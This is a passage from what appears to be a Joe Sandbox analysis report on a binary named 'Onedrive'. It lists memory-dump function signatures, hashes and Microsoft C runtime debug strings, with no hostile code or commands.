                                        • String ID: $ Data: <%s> %s$%.2X $(*_errno())$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$print_block_data
                                        • API String ID: 233258989-578187083
                                        • Opcode ID: dc6febcad760b90265b93becb28017f616756b66ea6b9f90a2c4d3c71971683e
                                        • Instruction ID: 2c96bfeede7cdca4c47ac27081c8d59171351e0e8533af9e7fc88f1b482972af
                                        • Opcode Fuzzy Hash: dc6febcad760b90265b93becb28017f616756b66ea6b9f90a2c4d3c71971683e
                                        • Instruction Fuzzy Hash: FA51397260DF82A5EA209B55F0903ABB7A0FB897C1F504036EACD47B9ADF7DD0448B40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::___crt_unique_heap_ptr
                                        • String ID: W$g$minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
                                        • API String ID: 4142048518-2829134390
                                        • Opcode ID: 5bbead02dfe7c340e301f50630c07c7c7bbcd2b1db9117826fc8bec54c57956b
                                        • Instruction ID: 4eaa09c1bc1ff482a6e1d713f8919594ca0922b59628dd3b715bde8d0fa8deb6
                                        • Opcode Fuzzy Hash: 5bbead02dfe7c340e301f50630c07c7c7bbcd2b1db9117826fc8bec54c57956b
                                        • Instruction Fuzzy Hash: D351FC3661AE86D2DB10CB19E49036AA7A0FBC4BC4F604135EB8E47BA5DF7DD552CB00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %ls$local_action != nullptr$minkernel\crts\ucrt\src\appcrt\misc\signal.cpp$raise
                                        • API String ID: 0-2615017910
                                        • Opcode ID: 5c35f3dc112a50c0e805789c276cfb06d19a61249ce228f93abf104dd4fd02bb
                                        • Instruction ID: af71d138a971a8b57f66e40101a57bca401161173a2a84775b44d4a38be6a05f
                                        • Opcode Fuzzy Hash: 5c35f3dc112a50c0e805789c276cfb06d19a61249ce228f93abf104dd4fd02bb
                                        • Instruction Fuzzy Hash: D541292291EE83A6F7609B21A45036EB6A0EBA93D0F104135E69E4ABD9CF7DD5448B40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$AllocSize
                                        • String ID: %ls$_expand_base$block != nullptr$minkernel\crts\ucrt\src\appcrt\heap\expand.cpp
                                        • API String ID: 3906553864-3244948836
                                        • Opcode ID: 4c804e17fcf2b797cd3c9b60ca826f5f76968aea305c4a7878b56130db89205d
                                        • Instruction ID: a21076a09fd4c4979501b62d06b175b3dfc2b47ac9324d057e71cea90869f093
                                        • Opcode Fuzzy Hash: 4c804e17fcf2b797cd3c9b60ca826f5f76968aea305c4a7878b56130db89205d
                                        • Instruction Fuzzy Hash: 1541593291EE87A6E7509B24E44036AB7A0FB987D4F100536E68D4BBA8DF7DD480CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_unique_heap_ptr
                                        • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$public_stream != nullptr
                                        • API String ID: 2978586664-187094882
                                        • Opcode ID: d9f09b24430cf7c905dcc77a9539ec568846fcd82fb5aab16ca27f9c7a20dcef
                                        • Instruction ID: 27de14b3388fd2ebe543235eef47935966bd9914c5e274d4128a104068094200
                                        • Opcode Fuzzy Hash: d9f09b24430cf7c905dcc77a9539ec568846fcd82fb5aab16ca27f9c7a20dcef
                                        • Instruction Fuzzy Hash: D2413C22A2AE82A6EB40DB50E4513AA7768FF84780F505136E68E47BA7DF7CD644C740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::___crt_unique_heap_ptr_aligned_msize_heap_alloc
                                        • String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp$to->_What == nullptr && to->_DoFree == false
                                        • API String ID: 4052397221-3183830673
                                        • Opcode ID: ff1b9f30799f4ad0d9ac1bffd9bde8d84be0301351c13d166f628ec1fe1495ed
                                        • Instruction ID: 074c96d1cd56275ef6ddcf733bd382a6f9ec49748b968e2467094b39d7d81c67
                                        • Opcode Fuzzy Hash: ff1b9f30799f4ad0d9ac1bffd9bde8d84be0301351c13d166f628ec1fe1495ed
                                        • Instruction Fuzzy Hash: D4312A3661EF86A5DA409F55E49026EB7A4FBC5BC0F905032EACD83BA5DF6CD540C700
                                        APIs
                                        • __vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031CD4D
                                          • Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641
                                        • __vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031CDA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: __vcrt_lock$CriticalEnterSection
                                        • String ID: %ls$7$_CrtSetDbgFlag$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$new_bits == _CRTDBG_REPORT_FLAG || new_bits_have_only_valid_flags
                                        • API String ID: 3216741998-3531600671
                                        • Opcode ID: 98ef7632041a8fad0750eee4cc8ea17460eb30706e3ace5ef71840ebc1773ca3
                                        • Instruction ID: 8654b7ce8e27f971708aae6ac3c1161be6361700fb58b92c5cd75b279c5090d6
                                        • Opcode Fuzzy Hash: 98ef7632041a8fad0750eee4cc8ea17460eb30706e3ace5ef71840ebc1773ca3
                                        • Instruction Fuzzy Hash: 92417E3292EA83AAE7509B24E44077A7AA0FB55385F001135F68A4ABE5CF7DE945CF40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %ls$_wcstombs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\wcstombs.cpp$pwcs != nullptr
                                        • API String ID: 0-287901994
                                        • Opcode ID: 743646601bf834168527aa144c1fd2e5dc80d6afa19a0699e979b3519a2906be
                                        • Instruction ID: cc6da4f7715b381695842bc8dfd68c47d2472a9e60087bf0c06bea1bf3878552
                                        • Opcode Fuzzy Hash: 743646601bf834168527aa144c1fd2e5dc80d6afa19a0699e979b3519a2906be
                                        • Instruction Fuzzy Hash: 8912DB3260DE8696D7708B15E4903AAB7A0F785794F104239EADD47BE8DF7DD484CB01
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: %ls$("Buffer too small", 0)$_wctomb_internal$destination_count <= INT_MAX$destination_count > 0$minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp
                                        • API String ID: 0-3614322479
                                        • Opcode ID: 0f614ffcc1881ecedfdfa505c1d907f0ae2ecf116d141dd64fc1443b1e234b41
                                        • Instruction ID: 69a000c1e78cea27e8d0200e9e57ce63142c950f8caadf6241396673bda44581
                                        • Opcode Fuzzy Hash: 0f614ffcc1881ecedfdfa505c1d907f0ae2ecf116d141dd64fc1443b1e234b41
                                        • Instruction Fuzzy Hash: 3CE12A3290EE83A6E7709B14E4443AAB7A0FBD8784F108536D68D47BA9DF7DD484CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DestroyException
                                        • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 2436776299-3177598755
                                        • Opcode ID: 9fcc800b697e66e5a2e00d7e63b0316d99a108fc15282cfc1420a90e1ce9cbd0
                                        • Instruction ID: 7b861af7b595f084bb5ff05d6a1a6ab3c3b07bf4991de8684bd15f9d876dcb4f
                                        • Opcode Fuzzy Hash: 9fcc800b697e66e5a2e00d7e63b0316d99a108fc15282cfc1420a90e1ce9cbd0
                                        • Instruction Fuzzy Hash: 5BC13E2661FE82A5EA609F65F4603BEA761FBC57C0F501032EA8D47B9ACF6DD444CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DestroyException
                                        • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 2436776299-3177598755
                                        • Opcode ID: 2903877c41504ff71dd7ac0ce2aa557120b8f1187956e46286f88ae249a88ae2
                                        • Instruction ID: 7724432f108a6944a499060c0bf0cc11e77f75c6a1f6076fee448ac909a14c85
                                        • Opcode Fuzzy Hash: 2903877c41504ff71dd7ac0ce2aa557120b8f1187956e46286f88ae249a88ae2
                                        • Instruction Fuzzy Hash: B4C12F2261FE82A5EB609F65E45037AB7A1FBC57C4F501032EA8E47B9ACF6DD444CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DestroyException
                                        • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<wchar_t,class __crt_stdio_output::string_output_adapter<wchar_t>,class __crt_stdio_output::fo$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 2436776299-3177598755
                                        • Opcode ID: 8c2f7f8cf4eb60a7f862857748a541016eaa27abcc5c4df5f5fa1067a4d7720e
                                        • Instruction ID: 36809265b782df805bfdd24dd46df816da31fa726824bcbfa0970617f3936b0d
                                        • Opcode Fuzzy Hash: 8c2f7f8cf4eb60a7f862857748a541016eaa27abcc5c4df5f5fa1067a4d7720e
                                        • Instruction Fuzzy Hash: 76C1202262EE8695EB60DB65E45037FA761FBC57C0F505032EA8D47B9ACF2DD444CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DestroyException
                                        • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 2436776299-1003573884
                                        • Opcode ID: b4f3e4260ec6d7b3d90b938558def7c2c3ed8f015c38342de67e4952101a5583
                                        • Instruction ID: 991222f417e0177458779098a5f82da9d021e6d6f3e76069e77b2bea88f4dd83
                                        • Opcode Fuzzy Hash: b4f3e4260ec6d7b3d90b938558def7c2c3ed8f015c38342de67e4952101a5583
                                        • Instruction Fuzzy Hash: 82C11E2662EE8295EA609F65E49037EB761FBC57C0F501031EA8E47B9ACF6DD444CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DestroyException
                                        • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 2436776299-2041781485
                                        • Opcode ID: 78b8b794c379b49e69a8979361e5dbb4b806ee50a32993ebf0ad29c2e8166d96
                                        • Instruction ID: 34286686ccfaf246a0786a0c846faa36a8c79f9cf1f5889fd1cc2ebaa7df742b
                                        • Opcode Fuzzy Hash: 78b8b794c379b49e69a8979361e5dbb4b806ee50a32993ebf0ad29c2e8166d96
                                        • Instruction Fuzzy Hash: AEC11E2262FE82A5EA60DB65E45037AB761FBC57C0F500036EA8E47B9ACF6DD445CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DestroyException
                                        • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 2436776299-1003573884
                                        • Opcode ID: b9c71c7ffbedc175137bab90b96f82f8f806c00a84a48dc1ea6ce4bedb3eed6c
                                        • Instruction ID: 552a612e0094886a2d370ccb89afa969b42cb382207fa21f6d41c1d256525bb1
                                        • Opcode Fuzzy Hash: b9c71c7ffbedc175137bab90b96f82f8f806c00a84a48dc1ea6ce4bedb3eed6c
                                        • Instruction Fuzzy Hash: 08C11E2261EEC395EA609B65E4503BAB7A1EBC57C0F501032EA8E47B9ACF6DD444CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DestroyException
                                        • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 2436776299-2041781485
                                        • Opcode ID: 469e38d6eed64a1a91316f730531ced8dac0510bf6a3972017723c6cfb3396b6
                                        • Instruction ID: 60f6aaf267ee4911224366f9b678f0ce0ae24898bc4b5e22662e66c9d49e693a
                                        • Opcode Fuzzy Hash: 469e38d6eed64a1a91316f730531ced8dac0510bf6a3972017723c6cfb3396b6
                                        • Instruction Fuzzy Hash: 12C10E2261EEC3A5EB609F65E4503BBA761EBC57C0F501032EA8E47B9ACF6DD444CB50
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DestroyException
                                        • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::string_output_adapter<char>,class __crt_stdio_output::format_v$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 2436776299-1003573884
                                        • Opcode ID: 308437765815ff5fef9f9c808688f9f617a22f9d268eaa4663d86ca56d1bbce6
                                        • Instruction ID: 016ef07d99a1c0aad7176926f46f7b37e018a4953c19c581a6b906d9886a8246
                                        • Opcode Fuzzy Hash: 308437765815ff5fef9f9c808688f9f617a22f9d268eaa4663d86ca56d1bbce6
                                        • Instruction Fuzzy Hash: 40C13F2661EEC295EA609B65E4503BFB7A1FBC57C0F101031EA8E47B9ACF2DD445CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DestroyException
                                        • String ID: %ls$("Invalid integer length modifier", 0)$__crt_stdio_output::output_processor<char,class __crt_stdio_output::stream_output_adapter<char>,class __crt_stdio_output::standard$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 2436776299-2041781485
                                        • Opcode ID: 912e2437d91deac4f330579838eef85cc56769922d80ecc1edd5ef1b8bc710e0
                                        • Instruction ID: 31126f200054420acf23e35371234c468c715d4bde319c60460e6c6703015626
                                        • Opcode Fuzzy Hash: 912e2437d91deac4f330579838eef85cc56769922d80ecc1edd5ef1b8bc710e0
                                        • Instruction Fuzzy Hash: 22C10D2661EEC2A5EB60DB65E4503BAB7A1EBC57C0F501031EA8E47B9ACF6DD444CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::_
                                        • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                        • API String ID: 2780765137-3439959449
                                        • Opcode ID: 8fc302a938c663c038e340c4baeda506e803461af4fb7fee05b98ac1756c9dc9
                                        • Instruction ID: 65e78ec48539afa97e82880c5cdff6be6708148662766cf87aed089cae57e255
                                        • Opcode Fuzzy Hash: 8fc302a938c663c038e340c4baeda506e803461af4fb7fee05b98ac1756c9dc9
                                        • Instruction Fuzzy Hash: 3BC12C2291EF8696EA70CB54F4503ABA3A0FB84785F601136E68D87B99DF7DD944CF00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_SchedulerScheduler::_
                                        • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                        • API String ID: 2780765137-3439959449
                                        • Opcode ID: c1ee4b9d8667413ed4f81e61ef1550aac306862adbeed06d7b0a525d6e872b36
                                        • Instruction ID: 58123bd0d81a96aa4b34c3ec8d0b5700e922449c73d65d9c767f6a139493e4c0
